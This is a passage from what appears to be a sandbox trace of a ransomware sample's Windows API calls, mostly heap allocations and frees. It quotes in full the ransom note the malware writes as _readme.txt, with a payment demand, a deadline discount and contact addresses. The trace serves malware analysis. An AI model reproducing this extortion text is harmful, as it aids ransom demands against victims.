tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0146.443] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328fd20 [0146.443] CreateFileW (lpFileName="C:\\Config.Msi\\_readme.txt" (normalized: "c:\\config.msi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.444] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328fd20 | out: hHeap=0x6e0000) returned 1 [0146.444] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.444] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.444] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d98 [0146.444] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea15050, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea15050, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea15050, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0xffffffff [0146.444] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240d98 | out: hHeap=0x6e0000) returned 1 [0146.444] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.444] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.444] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32407f8 | out: hHeap=0x6e0000) returned 1 [0146.444] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c70 [0146.444] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.444] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.444] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.444] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.444] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.444] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.444] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.444] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.444] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.444] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.444] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.444] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.444] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.444] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.444] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.444] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.444] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.444] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.444] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.444] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.444] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.444] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.444] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.444] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.445] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.445] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c70 | out: hHeap=0x6e0000) returned 1 [0146.445] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32407f8 [0146.445] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.445] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.445] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.445] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.445] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.445] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.445] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.445] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.445] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.445] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.445] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.445] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.445] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.445] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.445] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.445] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.445] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.445] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.445] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.445] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.445] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.445] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.445] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.445] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.445] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.445] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.445] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.445] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.445] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.445] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.445] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.445] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.445] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.445] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.446] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.446] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.446] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.446] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.446] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.446] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.446] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.446] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.446] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.446] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.446] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.446] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.446] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.446] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.446] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.446] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.446] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.446] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.446] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.446] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.446] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.446] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.446] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.446] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.446] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.446] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.446] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.446] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.446] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.446] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.446] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.446] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.446] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.446] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.446] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.446] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.446] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.447] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.447] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.447] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.447] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.447] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.447] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.447] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.447] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.447] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.447] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.447] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.447] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.447] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.447] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.447] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.447] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.447] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32407f8 | out: hHeap=0x6e0000) returned 1 [0146.447] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32407f8 [0146.447] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.447] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.447] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.447] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.447] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.447] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.447] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.447] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.447] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.447] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.447] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.447] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.447] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.447] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.447] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.447] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.447] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.447] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.447] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.447] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.448] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.448] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.448] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.448] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.448] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.448] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.448] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.448] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.448] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.448] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.448] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.448] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.448] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.448] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.448] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.448] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.448] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.448] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.448] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.448] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.448] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.448] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.448] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.448] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.448] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.448] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.448] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.448] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.448] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.448] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.448] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.448] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.448] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.448] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.448] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.449] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32407f8 | out: hHeap=0x6e0000) returned 1 [0146.449] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e6d0 [0146.449] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.449] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.449] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.449] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.449] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.449] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.449] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.449] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.449] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.449] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.449] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.449] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.449] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.449] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.449] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.449] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.449] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.449] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.449] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.449] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.449] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.449] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.449] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.449] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.449] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.449] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.449] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.449] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.449] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.449] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.449] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.449] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.449] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.449] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.450] PeekMessageW 